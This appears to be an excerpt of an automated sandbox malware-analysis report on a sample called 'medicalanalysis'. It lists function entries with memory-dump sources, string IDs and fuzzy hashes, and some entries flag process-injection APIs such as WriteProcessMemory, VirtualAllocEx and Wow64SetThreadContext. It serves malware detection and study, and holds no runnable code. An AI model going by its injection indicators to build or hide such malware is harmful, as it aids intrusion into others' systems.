                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: $^q$$^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-355816377
                                                                                                                                                                                                                                                                                                              • Opcode ID: 3beb54451a771b2dfb27bda366f7d06b9b30b2768adf7d6c9dae25d2ef15b8fd
                                                                                                                                                                                                                                                                                                              • Instruction ID: 14727f1b02f10bab480ddf85b18945d712b95477e42b0e98b085a997790ff331
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3beb54451a771b2dfb27bda366f7d06b9b30b2768adf7d6c9dae25d2ef15b8fd
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF128F35E102198FCF19DFA4E894AAEBBB6FF49700F148415E812EB394DB349945DFA0
                                                                                                                                                                                                                                                                                                              Function 057529D0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 2450 57529d0-57529f8 2451 57529ff-5752a28 2450->2451 2452 57529fa 2450->2452 2453 5752a49 2451->2453 2454 5752a2a-5752a33 2451->2454 2452->2451 2457 5752a4c-5752a50 2453->2457 2455 5752a35-5752a38 2454->2455 2456 5752a3a-5752a3d 2454->2456 2458 5752a47 2455->2458 2456->2458 2459 5752e07-5752e1e 2457->2459 2458->2457 2461 5752a55-5752a59 2459->2461 2462 5752e24-5752e28 2459->2462 2465 5752a5e-5752a62 2461->2465 2466 5752a5b-5752ab8 2461->2466 2463 5752e5d-5752e61 2462->2463 2464 5752e2a-5752e5a 2462->2464 2470 5752e63-5752e6c 2463->2470 2471 5752e82 2463->2471 2464->2463 2468 5752a64-5752a88 2465->2468 2469 5752a8b-5752aaf 2465->2469 2476 5752abd-5752ac1 2466->2476 2477 5752aba-5752b2b 2466->2477 2468->2469 2469->2459 2472 5752e73-5752e76 2470->2472 2473 5752e6e-5752e71 2470->2473 2474 5752e85-5752e8b 2471->2474 2479 5752e80 2472->2479 2473->2479 2482 5752ac3-5752ae7 2476->2482 2483 5752aea-5752b11 2476->2483 2485 5752b30-5752b34 2477->2485 2486 5752b2d-5752b8a 2477->2486 2479->2474 2482->2483 2505 5752b21-5752b22 2483->2505 2506 5752b13-5752b19 2483->2506 2491 5752b36-5752b5a 2485->2491 2492 5752b5d-5752b81 2485->2492 2494 5752b8c-5752be8 2486->2494 2495 5752b8f-5752b93 2486->2495 2491->2492 2492->2459 2507 5752bed-5752bf1 2494->2507 2508 5752bea-5752c4c 2494->2508 2503 5752b95-5752bb9 2495->2503 2504 5752bbc-5752bdf 2495->2504 2503->2504 2504->2459 2505->2459 2506->2505 2515 5752bf3-5752c17 2507->2515 2516 5752c1a-5752c32 2507->2516 2517 5752c51-5752c55 2508->2517 2518 5752c4e-5752cb0 2508->2518 2515->2516 2527 5752c34-5752c3a 2516->2527 2528 5752c42-5752c43 2516->2528 2524 5752c57-5752c7b 2517->2524 2525 5752c7e-5752c96 2517->2525 2529 5752cb5-5752cb9 2518->2529 2530 5752cb2-5752d14 2518->2530 2524->2525 2538 5752ca6-5752ca7 2525->2538 2539 5752c98-5752c9e 2525->2539 2527->2528 2528->2459 2535 5752ce2-5752cfa 2529->2535 2536 5752cbb-5752cdf 2529->2536 2540 5752d16-5752d78 2530->2540 2541 5752d19-5752d1d 2530->2541 2549 5752cfc-5752d02 2535->2549 2550 5752d0a-5752d0b 2535->2550 2536->2535 2538->2459 2539->2538 2551 5752d7d-5752d81 2540->2551 2552 5752d7a-5752dd3 2540->2552 2546 5752d46-5752d5e 2541->2546 2547 5752d1f-5752d43 2541->2547 2560 5752d60-5752d66 2546->2560 2561 5752d6e-5752d6f 2546->2561 2547->2546 2549->2550 2550->2459 2557 5752d83-5752da7 2551->2557 2558 5752daa-5752dc4 2551->2558 2562 5752dd5-5752df9 2552->2562 2563 5752dfc-5752dff 2552->2563 2557->2558 2571 5752dcc-5752dcd 2558->2571 2560->2561 2561->2459 2562->2563 2563->2459 2571->2459
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228162929.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5750000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 4'^q$4'^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-2697143702
                                                                                                                                                                                                                                                                                                              • Opcode ID: 701b748a93e840ebb89803847df5ff6b4e3918831664d3db48046440d247fb6f
                                                                                                                                                                                                                                                                                                              • Instruction ID: 598ac6fa63bce855749275aab39b4b2e329b80e818ea50b553162a50e999c462
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 701b748a93e840ebb89803847df5ff6b4e3918831664d3db48046440d247fb6f
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0F1C534E05309DFCB24DFA4D4996ACBBB2FF49321F608529E806A7351DB745986EF40
                                                                                                                                                                                                                                                                                                              Function 057526A8 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228162929.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5750000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 4'^q$4'^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-2697143702
                                                                                                                                                                                                                                                                                                              • Opcode ID: e0a4b9b9bfbe4850f6b049d2a6307660d10dc54966f272298a51d238584e3b8a
                                                                                                                                                                                                                                                                                                              • Instruction ID: 3ba524141f1de1cdf82a40eab0579dbace90195c2d768d45b4811ee602a20573
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0a4b9b9bfbe4850f6b049d2a6307660d10dc54966f272298a51d238584e3b8a
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCA1E238E05209CFCB18DFA5D4486ADBBB2FF88311F50842AE812B7355CB756986EF50
                                                                                                                                                                                                                                                                                                              Function 021B9B39 Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2218058169.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_21b0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: PH^q$`Q^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-3163867966
                                                                                                                                                                                                                                                                                                              • Opcode ID: 948cc7bb05df8d436107b1935a5563234f632081288294545123900165c7613d
                                                                                                                                                                                                                                                                                                              • Instruction ID: 38490310c7ae98b8066192504b8f42b493e67d8f1fbd5b351b4d270ee1f50640
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 948cc7bb05df8d436107b1935a5563234f632081288294545123900165c7613d
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13B1D074D48229CFDB659FA4CD48BE9BAB1BF49305F0080DAD54AA3260D7B02EC5DF61
                                                                                                                                                                                                                                                                                                              Function 05792FA7 Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: (bq$Hbq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-4081012451
                                                                                                                                                                                                                                                                                                              • Opcode ID: 2ae625b2a0ab30182144077081a29c712aa7df071759afe4471d3c778207653e
                                                                                                                                                                                                                                                                                                              • Instruction ID: 52d26d7486a42c00f7d8bff636ef43385546f4e27ad5903f449c2252a64c4096
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ae625b2a0ab30182144077081a29c712aa7df071759afe4471d3c778207653e
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5071F1316047418FDB28DF29D48476ABBF2BF81310F248A6AD446CB3A6DB35DC45DBA1
                                                                                                                                                                                                                                                                                                              Function 05798D51 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: (bq$(bq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-4224401849
                                                                                                                                                                                                                                                                                                              • Opcode ID: 68a37b253adc1624a72e3cf502be6767ea880b539a494d459aa5d7637c8b5884
                                                                                                                                                                                                                                                                                                              • Instruction ID: 24c664d16c818ea1e9bef12c1ad743456fb846bbcc6f04d5d96359e940c1bdda
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68a37b253adc1624a72e3cf502be6767ea880b539a494d459aa5d7637c8b5884
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7951B0317002058FDB199F28E894AAE7BA6FFC5355F108169E806CB3A1CF35DC46DBA1
                                                                                                                                                                                                                                                                                                              Function 057967B8 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: (bq$Hbq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-4081012451
                                                                                                                                                                                                                                                                                                              • Opcode ID: 310065c9ff7e7c01caa0c2305717b3e5a4a1edc0401e085d99b24a8e8cfac251
                                                                                                                                                                                                                                                                                                              • Instruction ID: 09beb567cfabbbeeeb72f7c83a93bb26c334f00bb71ff8434fb3e8591cd1713a
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 310065c9ff7e7c01caa0c2305717b3e5a4a1edc0401e085d99b24a8e8cfac251
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D5146347002118FCB29AF39D45892EBBB6FF99350724856DE9068B3A1CE35ED06DB91
                                                                                                                                                                                                                                                                                                              Function 05792A58 Relevance: 2.6, Strings: 2, Instructions: 124COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: (bq$03j
                                                                                                                                                                                                                                                                                                              • API String ID: 0-3343046818
                                                                                                                                                                                                                                                                                                              • Opcode ID: a89fdee6b99bd54e0f6c8b7b1b19512c21640101f952704e73955848bb5bf293
                                                                                                                                                                                                                                                                                                              • Instruction ID: b67b272e4f8825948efe830b304b2c155969167bcff64155e1dd95d7d2b444ea
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a89fdee6b99bd54e0f6c8b7b1b19512c21640101f952704e73955848bb5bf293
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3413A36704205AFDB15AF69E880AAE7FA7EFC5320B54407AE804DB355DE31DC05D7A1
                                                                                                                                                                                                                                                                                                              Function 0579BF20 Relevance: 2.6, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 4'^q$pbq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-3872760177
                                                                                                                                                                                                                                                                                                              • Opcode ID: 3aa3ade403975e931f9d4499328056bdcc72bcf046c620f71e6f84217418d427
                                                                                                                                                                                                                                                                                                              • Instruction ID: a0d8c598fdebb55d87c3c5312be7b1df8ddac8fd5bfc3b856674da53a0442941
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3aa3ade403975e931f9d4499328056bdcc72bcf046c620f71e6f84217418d427
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB41C2716402058FCB15DB78D9906AEBBF7FFC8300F148929D4499B369DB31A9468BA1
                                                                                                                                                                                                                                                                                                              Function 05C2291B Relevance: 2.5, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2230065854.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5c20000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 0Nj$j
                                                                                                                                                                                                                                                                                                              • API String ID: 0-84363139
                                                                                                                                                                                                                                                                                                              • Opcode ID: 7884342f411817580c345d2114603c3a66a9672c10e0906648949bfedef2e474
                                                                                                                                                                                                                                                                                                              • Instruction ID: 52515091809344ee0fa25d147e46e0f4f4420419ab2a285ec18ec2c8a969cb63
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7884342f411817580c345d2114603c3a66a9672c10e0906648949bfedef2e474
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4211DE78A082688FCB64DF18D8996DABBB5FB49304F1045E6E849A7784DB745E80CF41
                                                                                                                                                                                                                                                                                                              Function 05797D60 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: (_^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-538443824
                                                                                                                                                                                                                                                                                                              • Opcode ID: 64576b1dc657c1380539828a2dd35b765f7b9bfd4e658abf9d77bedc6361d89f
                                                                                                                                                                                                                                                                                                              • Instruction ID: 11f7bd5cceb701b7169d7e8161ee9c7e70076ba6e257e7ad5fe487b7b0b25049
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64576b1dc657c1380539828a2dd35b765f7b9bfd4e658abf9d77bedc6361d89f
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF228E71A102059FCB18DFA8D495A6DBBF6FF89300F14806AE906DB3A1CB71ED41DB61
                                                                                                                                                                                                                                                                                                              Function 056D12B8 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 056D138B
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228055733.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2227832328.0000000005680000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5680000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: d629ff87ed98e7b2201b4f0f0970f1ec2ae4f69058a32ea54f1e3886ed6143ad
                                                                                                                                                                                                                                                                                                              • Instruction ID: c4a97fb01e5fd20c90194438901a18864f582ff51cf940cea36103351caa3283
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d629ff87ed98e7b2201b4f0f0970f1ec2ae4f69058a32ea54f1e3886ed6143ad
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A94199B5D012589FCF00CFA9D984ADEFBF1BB49310F24942AE819B7210D774AA45CF64
                                                                                                                                                                                                                                                                                                              Function 056D0FC0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056D106A
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228055733.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2227832328.0000000005680000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5680000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: c8904ef9dad5747eb7145d96cbf8ff595cd7db638b04419410aa085c894ec7da
                                                                                                                                                                                                                                                                                                              • Instruction ID: 991c39863668fe2c79c5707029746201af74974b043d47639cebd133638253d7
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8904ef9dad5747eb7145d96cbf8ff595cd7db638b04419410aa085c894ec7da
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D23196B9D042589BCF10DFA9D980A9EFBB1BB49310F10942AE815B7210D735A946CF68
                                                                                                                                                                                                                                                                                                              Function 055D0F98 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 055D103C
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2226911411.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2226411527.00000000054B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_54b0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: f7ad665583e16bad55c815131382b7761557f03e786ef08be92b085c935c61df
                                                                                                                                                                                                                                                                                                              • Instruction ID: 28d0f55344520652e826092434cd3416fc3372803ee8e2ec5707d7d9dac95c29
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7ad665583e16bad55c815131382b7761557f03e786ef08be92b085c935c61df
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6331A7B5D012589FCB20DFA9D984ADEFBB1FB49310F20942AE814B7210D735A945CFA8
                                                                                                                                                                                                                                                                                                              Function 056D0900 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 056D09AF
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228055733.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2227832328.0000000005680000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5680000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 88770d4461b03745eeea1892f590e80f040211b9dec9667892f75d41fd376636
                                                                                                                                                                                                                                                                                                              • Instruction ID: d18f72b1cdafb0fd4a4a3f4f0b89f2706885a90619d3b1dcbbfe74f7094567e7
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88770d4461b03745eeea1892f590e80f040211b9dec9667892f75d41fd376636
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F31DCB5D012589FCB10CFA9D884AEEFBF0BB49320F14842AE405B7250D738A985CF64
                                                                                                                                                                                                                                                                                                              Function 0593CC10 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2229679987.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5930000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 9d403ddecb8c3838539d45e0aaa7abbf28cbc952aac65da9c917becacffc9687
                                                                                                                                                                                                                                                                                                              • Instruction ID: 947b85573bc866b639d1e3a066227271589b8cae7b671f354200d38aeebcec59
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d403ddecb8c3838539d45e0aaa7abbf28cbc952aac65da9c917becacffc9687
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E31DAB5D012189FCB10CFA9D980AEEFBF5EF49310F14942AE804B7250C734A946CFA4
                                                                                                                                                                                                                                                                                                              Function 0593CC18 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2229679987.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5930000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: dc011cdd3a86bbde63243ad3b0ba5141b5d6972b129f279ac668f5bc7156f2ab
                                                                                                                                                                                                                                                                                                              • Instruction ID: 6801a742f518c963b7969a8c0f0c3a94ef7fe424185d8934dcb950b8a4d0de8f
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc011cdd3a86bbde63243ad3b0ba5141b5d6972b129f279ac668f5bc7156f2ab
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA31C8B5D012589FCB10CFA9D980AEEFBF5AF49310F14942AE804B7210C735A945CFA4
                                                                                                                                                                                                                                                                                                              Function 0579D936 Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: ,bq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-2474004448
                                                                                                                                                                                                                                                                                                              • Opcode ID: 55d0f436dce1fa574b31d588105e9c78eac2cdaf09525426578060a67f1c764f
                                                                                                                                                                                                                                                                                                              • Instruction ID: e72092a84caf34af2495f0616c13157e2ff328f048547ca6daf0df36ec55a6cf
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55d0f436dce1fa574b31d588105e9c78eac2cdaf09525426578060a67f1c764f
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32C14270A40129CFDB64DF68C954BADBBF6FF88300F1084AAD509AB3A5DA319D85CF51
